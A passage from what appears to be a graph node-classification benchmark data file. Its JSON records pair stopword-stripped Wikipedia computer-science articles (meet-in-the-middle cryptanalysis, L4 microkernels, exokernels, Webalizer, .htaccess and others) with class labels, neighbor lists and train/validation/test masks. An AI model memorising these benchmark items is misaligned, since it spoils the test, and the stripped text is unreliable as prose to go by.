md-mitm preferred data encrypted using 2 encryptions different keys instead meeting middle one place sequence md-mitm attack attempts reach several specific intermediate states using forward backward computations several positions cipher assume attack mounted block cipher encryption decryption defined plaintext p encrypted multiple times using repetition block cipher md-mitm used cryptanalysis among many gost block cipher shown 3d-mitm significantly reduced time complexity attack compute following possible guess intermediate state formula_18 compute following whether matches formula_38 case use found combination sub-keys formula_39 another pair plaintext/ciphertext verify correctness key note nested element algorithm guess every possible value done guess previous make element exponential complexity overall time complexity md-mitm attack time complexity attack without brute force formula_40⋅formula_41⋅formula_42 regarding memory complexity easy see formula_43 much smaller first built table candidate values formula_44 increases candidate values contained formula_45 must satisfy conditions thereby fewer candidates pass end destination formula_38 upper bound memory complexity md-mitm denotes length whole key combined data complexity depends probability wrong key may pass obtain false positive formula_48 intermediate state first mitm phase size intermediate state block size often considering also many keys left testing first mitm-phase formula_49 therefore first mitm phase formula_50 |⋅| denotes length main memory consumption restricted construction sets b much smaller others data complexity see subsection complexity md-mitm",
    "neighbors": [
      7556,
      2567,
      3084,
      2957,
      7056,
      658,
      660,
      1173,
      1941,
      4128,
      4389,
      10662,
      9640,
      169,
      11185,
      2357,
      1847,
      9528,
      2110,
      9541,
      10315,
      6863,
      8273,
      9170,
      7635,
      212,
      9556,
      10963,
      11349,
      2265,
      7643,
      9697,
      8674,
      229,
      618,
      1898,
      881,
      1654,
      7161,
      7034,
      892,
      4863
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10807,
    "label": 5,
    "text": "Query_flooding:query flooding query flooding method search resource p2p network simple scales poorly thus rarely used early versions gnutella protocol operated query flooding newer versions use efficient search algorithms p2p network generally consists large number nodes connected nodes small subset nodes node wants find resource network may node know could simply broadcast search query immediate neighbours neighbours resource asks neighbours forward query neighbours turn repeated resource found nodes contacted perhaps network-imposed hop limit reached query flooding simple implement practical small networks requests contacts reachable nodes network precisely determine whether resource found network freenet example returns probabilistic result hand every request may cause every node contacted node might generate small number queries however query floods network thus larger network would generate far traffic per node smaller one making inherently unscalable additionally node flood network simply issuing request nonexistent resource could possible launch denial-of-service attack network version 0.6 gnutella protocol mandates query routing query routing specification explains ideas original research implemented file sharing networks kad network use distributed hash tables index files keyword searches bittorrent creates individual overlay networks sharing individual files archives searches performed mechanisms locating torrent files indexed web site similar mechanism use gnutella network magnet links instance bitzi provides web interface search magnet links earlier p2p networks napster used centralized database locate files scaling problem central server single point failure",
    "neighbors": [
      8640,
      2409,
      7802,
      4229
    ],
    "mask": "Train"
  },
  {
    "node_id": 10808,
    "label": 5,
    "text": "Internet_Explorer_for_Mac_OS_X:internet explorer mac os x internet explorer mac os x also referred internet explorer macintosh internet explorer macintosh edition internet explorer mac ie mac unsupported inactive proprietary web browser developed microsoft macintosh platform initial versions developed code base internet explorer windows later versions diverged particularly release version 5 included cutting edge fault-tolerant highly standards-compliant tasman layout engine result five-year agreement apple microsoft 1997 default browser classic mac os mac os x 1998 superseded apple safari web browser 2003 release mac os x 10.3 panther june 13 2003 microsoft announced ceasing development internet explorer mac final update released july 11 2003 browser included default installation mac os x 10.4 tiger released april 29 2005 microsoft stopped releases product december 31 2005 removed application macintosh downloads site january 31 2006 microsoft recommended users migrate recent web browsing technologies apple safari archived version download available softonic.com works mac os x 10.6 earlier versions discontinuation rosetta versions internet explorer macintosh released starting version 2 1996 version 5 received last patch 2003 ie versions mac typically lagged several months year behind windows versions included unique developments including layout engine tasman first version internet explorer macintosh operating system beta version internet explorer 2.0 macintosh released january 23 1996 free download microsoft website first version based spyglass mosaic web browser licensed spyglass available 68k ppc based macs running system 7.0.1 later supported embedding number multimedia formats web pages including avi quicktime formatted video aiff wav formatted audio final version released three months later april 23 version 2.1 released august year mostly aimed fixed bugs improving stability also added features support npapi first version internet explorer platform support quicktime vr aol 3.0 macintosh used ie 2.1 rendering engine built-in web browser november 5 1996 microsoft announced release beta version internet explorer version 3.0 macintosh release added support html version 3.2 cascading style sheets java applets activex controls final version made available january 8 1997 also added support ssl ntlm security protocols pics rsaci rating systems used control access websites based content ratings problem operating system extension used mac os called cfm68k runtime enabler led delay release version 3.0 macs based 68k line processors four months later may 14 microsoft released version 3.01 included version 68k-based machines version also included features windows version internet explorer 4.0 autocomplete monitoring favorites notified users sites favorites list updated also included support javascript introduced download manager cookie manager 1997 macworld expo boston august 6 steve jobs bill gates announced partnership microsoft apple amongst things apple agreed make internet explorer default browser instead netscape navigator five months later january 6 1998 macworld expo san francisco microsoft announced release final version internet explorer version 4.0 macintosh version 4 included support offline browsing dynamic html new faster java virtual machine security zones allow users administrators limit access certain types web content depending zone example intranet internet content coming publicized feature internet explorer 4.0 support microsoft active channel technology intended deliver regularly updated content users could personally tailor interests however active channel failed reach wide audience event apple announced release mac os 8.1 first version macintosh operating system bundle internet explorer default browser per agreement microsoft however version 4.0 ready time included version 3.01 bundled cds following year san francisco macworld expo january 9 1999 microsoft announced release internet explorer 4.5 macintosh edition new version dropped 68k processor support introduced form autofill print preview page holder pane let user hold page links one side screen opened pages right hand support mac os technology like sherlock year later january 5 2000 microsoft announced new version internet explorer san francisco macworld expo internet explorer 5 macintosh edition released two months later march 27 2000 windows version internet explorer 5 released year earlier used trident layout engine macintosh edition introduced new rendering engine called tasman designed compliant emerging w3c standards html 4.0 css level 1 dom level 1 ecmascript also introduced number features later added browsers complete support png image standard previous versions support doctype switching text zoom xml source view also included auction manager tracking auctions sites like ebay internet scrapbook allow users quickly easily store organize web content example image piece selected text preview releases browser included feature called mediabar integrated mp3 internet radio playback feature dropped final version initial release mac os 8 mac os 9 however two months release may 15 mac os x version released bundled mac os x dp4 release handed developers 2000 worldwide developers conference mac os x public beta included another preview mac os x version ie release mac os x 10.0 march 24 2001 included yet another preview mac os x version ie 5 updated later release mac os x v10.1 september 25 2001 included final version internet explorer 5.1 mac os x. ie 5.1 mac os 8 9 released december 18 2001 according jorg brown one ie mac developers microsoft version 5 team produced ie mac moved another project ie mac relegated something expected work spare time june 17 2002 microsoft announced release version 5.2 first mac os x-only release included performance security fixes support mac os x features likes quartz text smoothing 2002 microsoft reassigned developers develop version 6 internet explorer mac intended used base new product msn mac os x would subscription-only browser worked online msn service incorporate features like address book junk mail filters msn messenger client however hearing apple started development browser canceled standalone browser development concentrated msn browser released may 15 2003 june 13 2003 pc pro reported macintosh business unit general manager roz ho confirmed aside updates fix security problems would new versions internet explorer microsoft three days later june 16 2003 microsoft released final version mac os x ppc version 5.2.3 month later july 11 2003 released final version mac os 8 9 version 5.1.7 last versions internet explorer mac os x ppc distinguishing blue logo base logo used internet explorer 6 windows windows one lighter blue less 3-d features found internet explorer mac found common contemporary browsers possible exception internet explorer windows still features many browsers features found internet explorer mac contemporaries acid1 included offline easter egg accessible typing 'tasman internet explorer 5 mac os text replaced names developers",
    "neighbors": [
      6657,
      2579,
      6171,
      7713,
      3110,
      10791,
      9770,
      10282,
      559,
      4661,
      3639,
      10808,
      64,
      576,
      5707,
      9808,
      10834,
      6231,
      8281,
      603,
      6747,
      3167,
      7269,
      9834,
      1642,
      9328,
      9843,
      115,
      2676,
      3191,
      4728,
      124,
      1664,
      5765,
      6797,
      8854,
      10910,
      8351,
      7340,
      9908,
      11449,
      4797,
      11466,
      7885,
      4310,
      2777,
      8923,
      737,
      4326,
      6377,
      2282,
      5872,
      8443,
      7943,
      790,
      7965,
      1834,
      10026,
      7983,
      11060,
      10057,
      10060,
      8557,
      3961,
      6528,
      3971,
      3462,
      8584,
      9609,
      6028,
      7572,
      417,
      5026,
      11683,
      10174,
      9167,
      4048,
      5078,
      11223,
      479,
      5605,
      487,
      488,
      8169,
      494,
      1520,
      7152,
      5114,
      8700
    ],
    "mask": "None"
  },
  {
    "node_id": 10809,
    "label": 3,
    "text": "Exokernel:exokernel exokernel operating system kernel developed mit parallel distributed operating systems group also class similar operating systems operating systems generally present hardware resources applications high-level abstractions virtual file systems idea behind exokernels force abstractions possible application developers enabling make many decisions possible hardware abstractions exokernels tiny since functionality limited ensuring protection multiplexing resources considerably simpler conventional microkernels implementation message passing monolithic kernels implementation high-level abstractions implemented applications called library operating systems may request specific memory addresses disk blocks etc kernel ensures requested resource free application allowed access low-level hardware access allows programmer implement custom abstractions omit unnecessary ones commonly improve program performance also allows programmers choose level abstraction want high low exokernels seen application end-to-end principle operating systems force application program layer abstractions top abstractions designed different requirements mind example mit exokernel project cheetah web server stores preformatted internet protocol packets disk kernel provides safe access disk preventing unauthorized reading writing disk abstracted application libraries application uses traditionally kernel designers sought make individual hardware resources invisible application programs requiring programs interact hardware via abstraction model models include file systems disk storage virtual address spaces memory schedulers task management sockets network communication abstractions hardware make easier write programs general limit performance stifle experimentation new abstractions security-oriented application might need file system leave old data disk reliability-oriented application might need file system keeps data failure recovery one option remove kernel completely program directly hardware entire machine would dedicated application written conversely entire application codebase would dedicated machine exokernel concept compromise let kernel allocate basic physical resources machine e.g disk blocks memory pages processor time multiple application programs let program decide resources program link support library implements abstractions needs implement mit developed two exokernel-based operating systems using two kernels aegis proof concept limited support storage xok applied exokernel concept thoroughly essential idea mit exokernel system operating system act executive small programs provided application software constrained requirement exokernel must able guarantee use hardware safely mit exokernel manages hardware resources follows available library operating systems exokernel include custom exos system emulator bsd addition exokernel team created cheetah web server uses kernel directly exokernel concept around since least 1994 exokernels still research effort used major commercial operating systems concept operating exokernel system nemesis written university cambridge university glasgow citrix systems swedish institute computer science mit also built several exokernel-based systems including exos",
    "neighbors": [
      2560,
      6155,
      6675,
      7187,
      10776,
      25,
      4637,
      9762,
      4643,
      6180,
      5158,
      7217,
      10803,
      9784,
      576,
      2625,
      6221,
      3160,
      10333,
      97,
      10851,
      11363,
      6760,
      10856,
      8298,
      9835,
      7285,
      4727,
      2168,
      9335,
      634,
      1147,
      3197,
      1150,
      5247,
      11390,
      2179,
      10883,
      10891,
      6797,
      10382,
      9366,
      6296,
      2201,
      9370,
      9882,
      7325,
      9887,
      8879,
      3248,
      178,
      9907,
      6837,
      6329,
      8889,
      5823,
      8388,
      1736,
      2248,
      9932,
      5840,
      7382,
      8410,
      9436,
      1247,
      225,
      11489,
      1253,
      7403,
      242,
      5363,
      9466,
      5371,
      2811,
      9468,
      1278,
      10499,
      1804,
      273,
      8977,
      787,
      11539,
      789,
      5397,
      10016,
      292,
      10235,
      2345,
      7983,
      2355,
      7477,
      823,
      4409,
      6459,
      7483,
      6974,
      7999,
      11075,
      4423,
      5452,
      6988,
      5457,
      11601,
      7507,
      7511,
      10590,
      5472,
      3426,
      8551,
      5484,
      7020,
      11635,
      5492,
      2933,
      376,
      8573,
      7039,
      8063,
      10113,
      8069,
      7561,
      394,
      3978,
      4492,
      7057,
      11667,
      11675,
      8092,
      2462,
      5022,
      421,
      1445,
      935,
      4521,
      9643,
      4525,
      11184,
      7601,
      2994,
      10676,
      5049,
      6075,
      6078,
      9151,
      11204,
      11205,
      4040,
      8136,
      9166,
      10730,
      10731,
      8687,
      6128,
      5105,
      5619,
      5115
    ],
    "mask": "Train"
  },
  {
    "node_id": 10810,
    "label": 1,
    "text": "Threat_Matrix_(database):threat matrix database threat matrix intelligence-based measure thorough assessments database program pakistani government officials military science circles use evaluating perceived external internal threats challenge national security pakistan development began 2011 government prime minister yousaf raza gillani program identifies military operational priorities goes beyond comprehensively describing existential non-existential threats country threat matrix program viewed become permanent fixture national security policy pakistan database comprehensive existence revealed political scientist dr. farrukh saleem work published news international 2013 earlier mentioned ispr press briefing given media published thesis saleem critically opined source existential threats always state actor non-state armed forces threat matrix two defined dimensions conventional threats sub-conventional threats conventional threats external threats national security outside country sub-conventional threats refer internal threats national security within country january 2013 major-general asif salim inter-services public relations ispr briefed news media new recent studies conducted pakistan military according ispr armed forces programmed conventional warfare current situation necessitated change forces fighting front-line tribal regions program according requirements sub-conventional warfare interview military scientist talat masood noted new doctrine india viewed 1 enemy first time realised pakistan faces real threat within threat concentrated areas along western borders conflict northwest closely tied war afghanistan factors like militant insurgency future us pullout afghanistan intertwined effect conflict pakistan according lieutenant-general khalid rabbani commander xi corps peshawar withdrawal foreign combat troops afghanistan since 2014 may trigger challenging ramifications pakistan terms threat matrix afghanistan leaving giving notion success taliban afghanistan notion success may snowballing effect threat matrix afghanistan along challenges posed western front india still retains important focus threat assessments pakistan civil-military foreign policy doctrine according express tribune editorial potential threat arch-rival india east effect state threat matrix western front dwindling capacity state cope terrorism owed pakistan 'vigilance eastern border pakistan static 'threat matrix expects india attack occupy pakistan never accepted creation pakistan harsh v. pant outlook india thinks pakistan fast-growing nuclear arsenal expanding greater rate india charged sociopolitical atmosphere country rapidly changing dynamics nuclear matrix region tactically underscores pakistani military establishment india-centric threat matrix 2016 pakistan navy revealed developing maritime doctrine response evolving conventional subconventional threat matrix region indian ocean doctrine would aim protect pakistan maritime interests region according j. berkshire miller diplomat military establishment pakistan meanwhile still views threat matrix india-centric lens—pakistan genuinely believes rightly wrongly india continues work aggressively strategic interests bribery espionage afghanistan comprehensive thesis minimum deterrence pakistan dilemma published royal united services institute rusi nuclear strategist theorist brigadier-general retired feroz hassan khan states pakistan threat matrix dramatically changed events 1971 war india nuclear bomb test 1974 country threat perception became dominated twin threat india conventional force superiority nuclear weapons capability acquisition nuclear weapons hence became pakistan highest national security objective unanimity across parts political spectrum augmented strong perception outside powers could relied upon moments crisis war term also economic connotations instance us secretary state hillary clinton outlined downturn global financial crisis effect pakistan especially context war militancy economic crisis left unresolved create massive unemployment upend governments unfortunately breed instability ... appreciated putting context threat matrix look pakistan country know stabilized benefit south asia beyond june 2013 pakistan armed forces started joint-war game exercise codenamed azm-i-nau iv aim update military readiness strategy dealing complex security threat environment objective exercise assess military tactics procedures techniques event emerging threat environment explore joint operations strategies response combating threat three branches military army air force navy exercise took place amid renewed fears situation afghanistan post-withdrawal coalition forces 2014 well continuing internal threat terrorism india growing regional ambitions newspaper dawn reported senior military official said war games meant coming comprehensive response threats explained threat matrix evolving transforming includes internal challenge terror groups various shades conventional threat external aggression 2009 azm-i-nau exercises aimed preempting india cold start doctrine improving joint armed forces response conventional threat work published dr. farrukh saleem current threat matrix five major elements military nuclear terrorism cyber economic according saleem first two threats military nuclear existential nature threaten basis state physical existence existential threats essentially threaten unity demography integrity nation-state pakistan last three threats terrorism cyber economic non-existential nature asymmetric sense belligerents possess unequal military resources weaker opponent uses unconventional weapons tactics exploit vulnerabilities enemy government military science officials describing threat matrix program legally morally sound recent joint military exercises conducted rapidly respond threat matrix falls category low-intensity conflict confronted areas country soon revelation program international media ispr international media quoted change policy seen paradigm shift country policy however pakistani political science scholar ghazi salahuddin remains uncertain described paradigm shift",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 10811,
    "label": 2,
    "text": "Hybrid_array:hybrid array hybrid array form hierarchical storage management combines hard disk drives hdds solid-state drives ssds i/o speed improvements hybrid storage arrays aim mitigate ever increasing price-performance gap hdds dram adding non-volatile flash level memory hierarchy hybrid arrays thus aim lower cost per i/o compared using ssds storage hybrid architectures simple involving single ssd cache desktop laptop computers complex configurations data centers cloud computing commercial products building hybrid arrays include",
    "neighbors": [
      8353,
      4194,
      2339,
      7106,
      8900,
      935,
      8328,
      10382,
      2066,
      823,
      10202,
      3323,
      9343
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10812,
    "label": 2,
    "text": "Sticky_Notes:sticky notes sticky notes desktop notes application included windows 7 windows 8 windows 10 present windows vista gadget windows sidebar originated windows xp tablet edition 2002 program allows users take notes using post-it note–like windows desktop according microsoft employee eight million monthly sticky notes users april 2016 original sticky notes gadget one many included vista although gadgets continued windows 7 sticky notes removed list made standalone app built win32 platform could still open startup version directly support pen input default color yellow five colors offered sticky notes jumplists taskbar preview shows notes stack sticky notes automatically saved version reused windows 8 initial releases windows 10 windows 10 anniversary update new version built universal windows platform introduced launched standalone app part windows ink workspace latter method causes space behind notes become blurred new version directly accepts pen input recognize words letters handwritten text new sticky notes provides stock information ticker typed written provides flight info flight number typed written cortana integration create reminders notes include date unlike windows 7 version version taskbar preview shows stock image rather notes user created originally jump list added back version 1.6.2 february 6 2017 sticky notes sync notes across multiple devices windows 10 also ios android devices running microsoft onenote web client edit sticky notes also available onenote website obscure codice_1 location",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      2101,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      8315,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      3834,
      1791,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      9173,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 10813,
    "label": 3,
    "text": "L4_microkernel_family:l4 microkernel family l4 family second-generation microkernels generally used implement unix-like operating systems also used variety systems l4 like predecessor l3 microkernel created german computer scientist jochen liedtke response poor performance earlier microkernel-based operating systems liedtke felt system designed start high performance rather goals could produce microkernel practical use original implementation hand-coded intel i386-specific assembly language code 1993 sparked intense interest computer industry since introduction l4 developed platform independence also improving security isolation robustness various re-implementations original binary l4 kernel interface abi successors including l4ka :pistachio uni karlsruhe l4/mips unsw fiasco tu dresden wrmos wrmlab reason name l4 generalized longer refers liedtke original implementation applies whole microkernel family including l4 kernel interface different versions l4 widely deployed one variant okl4 open kernel labs shipped billions mobile devices specifying general idea microkernel liedtke states concept tolerated inside microkernel moving outside kernel i.e. permitting competing implementations would prevent implementation system required functionality spirit l4 microkernel provides basic mechanisms address spaces abstracting page tables providing memory protection threads scheduling abstracting execution providing temporal protection inter-process communication controlled communication across isolation boundaries operating system based microkernel like l4 provides services servers user space monolithic kernels like linux older generation microkernels include internally example order implement secure unix-like system servers must provide rights management mach included inside kernel poor performance first-generation microkernels mach led number developers re-examine entire microkernel concept mid-1990s asynchronous in-kernel-buffering process communication concept used mach turned one main reasons poor performance induced developers mach-based operating systems move time-critical components like file systems drivers back inside kernel somewhat ameliorated performance issues plainly violates minimality concept true microkernel squanders major advantages detailed analysis mach bottleneck indicated among things working set large ipc code expresses poor spatial locality results many cache misses in-kernel analysis gave rise principle efficient microkernel small enough majority performance-critical code fits first-level cache preferably small fraction said cache jochen liedtke set prove well designed thinner ipc layer careful attention performance machine-specific opposed platform independent design could yield massive real-world performance improvements instead mach complex ipc system l3 microkernel simply passed message without additional overhead defining implementing required security policies considered duties user space servers role kernel provide necessary mechanism enable user-level servers enforce policies l3 developed 1988 proved safe robust operating system used many years example tüv süd experience using l3 liedtke came conclusion several mach concepts also misplaced simplifying microkernel concepts even developed first l4 kernel primarily designed high performance mind order wring every bit performance entire kernel written assembly language ipc 20 times faster mach dramatic performance increases rare event operating systems liedtke work triggered new l4 implementations work l4-based systems number universities research institutes including ibm liedtke started work 1996 tu dresden unsw ibm thomas j. watson research center liedtke colleagues continued research l4 microkernel based systems general especially sawmill os 1999 liedtke took systems architecture group university karlsruhe continued research microkernel systems proof concept high performance microkernel could also constructed higher level language group developed l4ka :hazelnut c++ version kernel ran ia-32- arm-based machines effort success — performance still acceptable — release pure assembly language versions kernels effectively discontinued parallel development l4ka :hazelnut 1998 operating systems group tud os tu dresden dresden university technology started develop c++ implementation l4 kernel interface called l4/fiasco contrast l4ka :hazelnut allow concurrency kernel successor l4ka :pistachio allows interrupts kernel specific preemption points l4/fiasco fully preemptible exception extremely short atomic operations achieve low interrupt latency considered necessary l4/fiasco used basis drops hard real-time capable operating system also developed tu dresden however complexities fully preemptible design prompted later versions fiasco return traditional l4 approach running kernel interrupts disabled except limited number preemption points release l4ka :pistachio newer versions fiasco l4 microkernels inherently tied close underlying cpu architecture next big shift l4 development development platform-independent api still retained high performance characteristics despite higher level portability although underlying concepts kernel new api provided many significant changes relative previous l4 versions including better support multi-processor systems looser ties threads address spaces introduction user-level thread control blocks utcbs virtual registers releasing new l4 api version x.2 a.k.a version 4 early 2001 system architecture group university karlsruhe implemented new kernel l4ka :pistachio completely scratch focus high performance well portability released two-clause bsd license l4/fiasco microkernel also extensively improved years supports several hardware platforms ranging x86 amd64 several arm platforms notably version fiasco fiasco-ux run user-level application top linux l4/fiasco implements several extensions l4v2 api exception ipc enables kernel send cpu exceptions user-level handler applications help alien threads possible perform fine-grained control system calls x.2-style utcbs added furthermore fiasco contains mechanisms controlling communication rights well kernel-level resource consumption top fiasco collection basic user level services developed called l4env amongst others used para-virtualise current linux version 4.19 may 2019 called l4linux development also took place university new south wales unsw developers implemented l4 several 64-bit platforms work resulted l4/mips l4/alpha resulting liedtke original version retrospectively named l4/x86 like liedtke original kernels unsw kernels written mixture assembly c unportable implemented scratch release highly portable l4ka :pistachio unsw group abandoned kernels favor producing highly tuned ports l4ka :pistachio including fastest-ever reported implementation message passing 36 cycles itanium architecture group also demonstrated user-level device drivers perform well in-kernel drivers developed wombat highly portable version linux l4 runs x86 arm mips processors xscale processors wombat demonstrates context-switching costs 50 times lower native linux later unsw group new home nicta forked l4ka :pistachio new l4 version called nicta :l4-embedded name implies aimed use commercial embedded systems consequently implementation trade-offs favored small memory footprints aimed reduce complexity api modified keep almost system calls short enough need preemption points ensure high real-time responsiveness november 2005 nicta announced qualcomm deploying nicta l4 version mobile station modem chipsets led use l4 mobile phone handsets sale late 2006 august 2006 ertos leader unsw professor gernot heiser spun company called open kernel labs ok labs support commercial l4 users develop l4 commercial use brand name okl4 close collaboration nicta okl4 version 2.1 released april 2008 first generally available version l4 featured capability-based security okl4 3.0 released october 2008 last open-source version okl4 recent versions closed source based rewrite support native hypervisor variant called okl4 microvisor ok labs also distributed paravirtualized linux called ok linux descendant wombat well paravirtualized versions symbianos android ok labs also acquired rights sel4 nicta okl4 shipments exceeded 1.5 billion early 2012 mostly qualcomm wireless modem chips deployments include automotive infotainment systems apple mobile application processors beginning a7 contain secure enclave coprocessor running l4 operating system based l4-embedded kernel developed nicta 2006 implies l4 shipping ios devices total shipment estimated 310 million year 2015 2006 nicta group commenced from-scratch design third-generation microkernel called sel4 aim providing basis highly secure reliable systems suitable satisfying security requirements common criteria beyond beginning development aimed formal verification kernel ease meeting sometimes conflicting requirements performance verification team used middle-out software process starting executable specification written haskell sel4 uses capability-based access control enable formal reasoning object accessibility formal proof functional correctness completed 2009 proof provides guarantee kernel implementation correct specification implies free implementation bugs deadlocks livelocks buffer overflows arithmetic exceptions use uninitialised variables sel4 claimed first-ever general-purpose operating-system kernel verified sel4 takes novel approach kernel resource management exporting management kernel resources user level subjects capability-based access control user resources model also adopted barrelfish simplifies reasoning isolation properties enabler later proofs sel4 enforces core security properties integrity confidentiality nicta team also proved correctness translation c executable machine code taking compiler trusted computing base sel4 implies high-level security proofs hold kernel executable sel4 also first published protected-mode os kernel complete sound worst-case execution-time wcet analysis prerequisite use hard real-time systems 29 july 2014 nicta general dynamics c4 systems announced sel4 end end proofs released open-source licenses kernel source proofs gplv2 libraries tools 2-clause bsd license researchers state cost formal software verification lower cost engineering traditional high-assurance software despite providing much reliable results specifically cost one line code development sel4 estimated around compared traditional high-assurance systems darpa high-assurance cyber military systems hacms program nicta together project partners rockwell collins galois inc university minnesota boeing developed high-assurance drone based sel4 along assurance tools software planned technology transfer onto optionally piloted autonomous unmanned little bird helicopter development boeing final demonstration hacms technology took place sterling va april 2017 darpa also funded several small business innovative research sbir contracts related sel4 program started dr. john launchbury small businesses receiving sel4-related sbir included dornerworks techshot wearable inc real time innovations critical technologies osker os written haskell targeted l4 specification although project focused use functional programming language os development microkernel research per se codezero l4 microkernel targeting embedded systems focus virtualization implementation native os services gpl-licensed version version relicensed developers closed source forked 2010 f9 microkernel bsd-licensed l4 implementation built scratch deeply embedded devices performance arm cortex-m3/m4 processors power consumption memory protection mind fiasco.oc third generation microkernel evolved predecessor l4/fiasco fiasco.oc capability based supports multi-core systems hardware assisted virtualization completely redesigned user-land environment running top fiasco.oc called l4 runtime environment l4re provides framework build multi-component systems including client/server communication framework common service functionality virtual file-system infrastructure popular libraries c library libstdc++ pthreads platform also offers l4linux multi-architecture virtualized linux system l4re fiasco.oc run x86 ia-32 amd64 arm powerpc wip supersede previous system l4env l4/fiasco nova os virtualization architecture research project focus constructing secure efficient virtualization environment small trusted computing base nova consists microhypervisor user level virtual-machine monitor unprivileged componentised multi-server user environment running top called nul nova runs x86-based multi-core systems wrmos open source real time operating system rtos based l4 microkernel implementations kernel standard libraries network stack following architectures supported sparc arm x86 x86_64 wrmos kernel based l4 kernel reference manual version x.2 paravirtualized linux kernel w4linux working top wrmos",
    "neighbors": [
      256,
      4225,
      2179,
      2951,
      9863,
      7561,
      3082,
      7566,
      6415,
      11026,
      5523,
      7187,
      5397,
      5529,
      6300,
      6813,
      3999,
      1952,
      10016,
      10146,
      3876,
      11180,
      9646,
      7983,
      823,
      7480,
      1849,
      5049,
      7483,
      10813,
      4929,
      4034,
      7234,
      9921,
      3142,
      8904,
      2761,
      9931,
      7884,
      11596,
      10835,
      9300,
      4695,
      728,
      5976,
      9176,
      10199,
      477,
      5598,
      6495,
      10851,
      11109,
      1768,
      9320,
      3178,
      5483,
      9964,
      10734,
      5363,
      3700,
      11123,
      10614,
      3323,
      8700,
      2558,
      5503
    ],
    "mask": "Test"
  },
  {
    "node_id": 10814,
    "label": 8,
    "text": "Webalizer:webalizer webalizer web log analysis software generates web pages analysis access usage logs one commonly used web server administration tools initiated bradford l. barrett 1997 statistics commonly reported webalizer include hits visits referrers visitors countries amount data downloaded statistics viewed graphically presented different time frames day hour month website traffic analysis produced grouping aggregating various data items captured web server form log files website visitor browsing website webalizer analyzes web server log files extracting items client ip addresses url paths processing times user agents referrers etc grouping order produce html reports web servers log http traffic using different file formats common file formats common log format clf apache custom log format extended log file format example clf log line shown apache custom log format customized log http parameters including request processing time size request format custom log controlled format line typical apache log format configuration shown microsoft internet information services iis web server logs http traffic w3c extended log file format similarly apache custom log format iis logs may configured capture extended parameters request processing time w3c extended logs may recognized presence one format lines one shown webalizer process clf apache w3c extended log files well http proxy log files produced squid servers log file formats usually converted clf order analyzed addition logs compressed either gzip .gz bzip2 .bz2 processed directly without need uncompress use webalizer command line application launched operating system shell prompt typical command shown command instructs webalizer analyze log file access_log run incremental mode -p interpret log clf log file -f use domain name en.wikipedia.org report links -n produce output subdirectory current directory use -h option see complete list command line options besides command line options webalizer may configured parameters configuration file default webalizer reads file webalizer.conf interprets line processing instruction alternatively user-specified file may provided using -c option example webmaster would like ignore requests made particular group hosts use ignoresite parameter discard log records ip address matching specified pattern one hundred available configuration parameters make webalizer highly configurable web traffic analysis application complete list configuration parameters please refer readme file shipped every source binary distribution default webalizer produces two kinds reports yearly summary report detailed monthly report one analyzed month yearly summary report provides information number hits file page requests hosts visits well daily averages counters month report accompanied yearly summary graph monthly reports generated single html page containing monthly summary report listing overall number hits file page requests visits hosts etc daily report grouping counters days month aggregated hourly report grouping counters hour day together url report grouping collected information url host report ip address website entry exit url reports showing common first last visit urls referrer report grouping referring third-party urls leading analyzed website search string report grouping items search terms used search engines google user agent report grouping browser type country report grouping host country origin standard html reports described lists top entries item e.g top 20 urls actual number lines reports controlled configuration webalizer may also configured produce separate report items list every single item website visitors requested urls etc addition html reports webalizer may configured produce comma-delimited dump files list report data plain-text file dump files may imported spreadsheet applications databases analysis html reports may produced reports 30 languages including catalan croatian czech danish dutch english estonian finnish french galician german greek hungarian icelandic indonesian italian japanese korean latvian malay norwegian polish portuguese portuguese brazil romanian russian serbian simplified chinese slovak slovene spanish swedish turkish ukrainian generate reports alternate language requires separate webalizer binary compiled specifically language",
    "neighbors": [
      4640,
      7078,
      9768,
      3401,
      5612,
      7983,
      6576,
      5524,
      1943,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 10815,
    "label": 8,
    "text": ".htaccess:.htaccess .htaccess hypertext access file directory-level configuration file supported several web servers used configuration website-access issues url redirection url shortening access control different web pages files 'dot period full stop file name makes hidden file unix-based environments site could one .htaccess file files placed inside web tree i.e inside directories sub-directories hence name distributed configuration files .htaccess files act subset server global configuration file like httpd.conf directory sub-directories original purpose .htaccess—reflected name—was allow per-directory access control example requiring password access world wide web content commonly however .htaccess files define override many configuration settings content type character set common gateway interface handlers etc .htaccess files written apache directives variant perl compatible regular expressions pcre language learning basic pcre help mastering work files historical reasons format .htaccess files limited subset apache http server global configuration file httpd.conf even used web servers oracle iplanet web server zeus web server different native global configuration files controlling apache using main server configuration file httpd.conf often preferred security performance reasons",
    "neighbors": [
      3330,
      10125,
      5012,
      8350,
      8994,
      3237,
      46,
      2737,
      2485,
      1206,
      5433,
      7368,
      7370,
      7644,
      865,
      225,
      113,
      5492,
      119
    ],
    "mask": "None"
  },
  {
    "node_id": 10816,
    "label": 5,
